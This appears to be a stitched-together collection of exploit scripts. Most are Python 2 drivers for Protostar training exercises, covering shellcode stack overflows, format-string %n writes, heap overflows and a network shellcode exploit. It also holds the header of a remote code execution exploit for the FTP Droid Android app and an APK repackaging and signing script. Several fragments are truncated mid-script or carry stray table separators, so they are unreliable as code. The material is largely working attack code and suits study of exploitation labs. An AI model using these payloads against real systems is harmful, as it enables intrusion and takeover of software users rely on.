import sys

# Input-file generator for the Protostar "stack5" training exercise.
# The file written to /tmp/stack5 has three parts, in order: the raw byte
# string below, a run of 'a' filler bytes, and a final 4-byte value that the
# trailing comment says is intended to overwrite the saved return address.
# Written for Python 2: the "\x.." escapes in a plain str are raw bytes.
shellcode = "\xe9\x1e\x00\x00\x00\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0f\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xffHello wolrd!\r\n"
with open('/tmp/stack5', 'w') as f:
    # Filler count is computed from sys.getsizeof(shellcode) (the interpreter's
    # object size for the str), not from the string's character count.
    times = 76 - sys.getsizeof(shellcode) # to fil the rest of the space
    f.write(shellcode);
    f.write('a' * times)
    f.write('\xe0\xfc\xff\xbf') # write the pointer to the start of the address as EIP
import subprocess

# Driver for the Protostar "format2" training exercise: builds one line of
# input, feeds it to the target binary over stdin and prints what the binary
# writes to stdout.  Python 2 syntax (print statement, str used as bytes).
write_formt_exploit = '%20x%20x%20x%n'   # printf-style directives ending in %n
write_ptr = '\xe4\x96\x04\x08'           # four raw bytes placed at the front of the line
# NOTE: the name `input` shadows the builtin input(); harmless here since it is never called.
input = write_ptr + write_formt_exploit + '\n'
proc = subprocess.Popen(['/opt/protostar/bin/format2'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# stderr was not redirected, so communicate() returns None for it; only stdout is captured.
stdout,stderr = proc.communicate(input=input)
print stdout
import subprocess | |
#we need to write 16930116 more chars | |
target_address = '\xf4\x96\x04\x08' | |
value_to_write = '\xF7\x54\x02\x01' | |
padding = '\x41' | |
leak_ptr = '%x ' * 12 | |
write_to_ptr_format = '%x%x%x%x%x%x%x%x%x%x%x %0*c' + '%n' |
import subprocess | |
# hello function 080484b4 | |
# vuln function 080484d2 | |
# printf address 0804971c | |
# exit address 08049724 | |
orig_leak_ptr = '%x %x %x %x %x %x' | |
leak_ptr = '%x %x %x %0*x %n' | |
write_to_address = '\x24\x97\x04\x08' # where should we write |
import subprocess

# Driver for the Protostar "heap0" training exercise.  Unlike the stdin-based
# drivers in this set, the crafted string is passed as argv[1]; the program's
# stdout is then printed.  Python 2 syntax (print statement, str as bytes).
# NOTE: `input` shadows the builtin input(); it is never called here, so harmless.
input = 'a' * 64 + 'b' * 8 + '\x64\x84\x04\x08'   # 72 filler bytes followed by four raw bytes
proc = subprocess.Popen(['/opt/protostar/bin/heap0',input], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# A stdin pipe is opened but nothing is written to it; stderr is not redirected,
# so communicate() returns None for it.
stdout,stderr = proc.communicate()
print stdout
import subprocess

# Driver for the Protostar "heap2" training exercise: sends four
# newline-terminated commands (auth, reset, service, login) to the target's
# stdin in a single write and prints the captured stdout.
# NOTE: `input` shadows the builtin input(); it is never called here, so harmless.
input = 'auth 1111111111111111111111111111111111111111\nreset\nservice 111111111111111111111111111111111111111111111\nlogin\n'
proc = subprocess.Popen(['/opt/protostar/bin/heap2'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# stderr is not redirected, so communicate() returns None for it.
stdout,stderr = proc.communicate(input=input)
print(stdout)
# Symbol-table line (objdump -t style) kept for reference only; not used by the script:
# 08048494 g F .text 00000025 winner
import socket | |
# shellcode thanks to https://blackndoor.fr/protostar-final0/, https://www.exploit-db.com/exploits/13427/ | |
shellcode = '\x90' * 150 + b"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5f\x81\xef\xdf\xff\xff\xff\x57\x5e\x29\xc9\x80\xc1\xb8\x8a\x07\x2c\x41\xc0\xe0\x04\x47\x02\x07\x2c\x41\x88\x06\x46\x47\x49\xe2\xedDBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKBAFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIAJDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJOBLAALMNIA" | |
csocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
csocket.connect(('127.0.0.1', 2995)) | |
# ret addr thanks to https://blackndoor.fr/protostar-final0/ | |
ret_addr = b'\x60\xfa\xff\xbf' |
import socket | |
import struct | |
def exploit(): | |
# sent_payload 'GET ' | |
padding = b'a' * 139 | |
payload = padding + struct.pack('I', 0xdeadbeef) | |
# connecting | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
# Exploit Title: FTP Droid 2.1.2 Remote Code Execution (1-click) | |
# Google Dork: [if applicable] | |
# Date: 30.12.2018 | |
# Exploit Author: Guy Ishay | |
# Vendor Homepage: https://forum.xda-developers.com/showthread.php?t=1175825 | |
# Software Link: https://play.google.com/store/apps/details?id=berserker.android.apps.ftpdroid | |
# Version: 2.1.2 | |
# Tested on: Android 4.4 | |
# CVE : None | |
# ==================== |
#!/bin/bash
# Rebuilds the decoded APK tree in ./base with apktool, signs the result with
# jarsigner and renames it to res.apk.
# There is no `set -e`, so if the apktool step fails the later jarsigner and mv
# steps still run against whatever stage1-unsigned.apk happens to exist.
rm stage1-unsigned.apk res.apk   # prints an error (but continues) if either file is absent
apktool b base -o stage1-unsigned.apk
# NOTE(review): passing -storepass on the command line exposes the keystore
# password to other local users via the process list and to the shell history.
jarsigner -keystore my-release-key.keystore -storepass 1234567890 stage1-unsigned.apk my-key-alias
mv stage1-unsigned.apk res.apk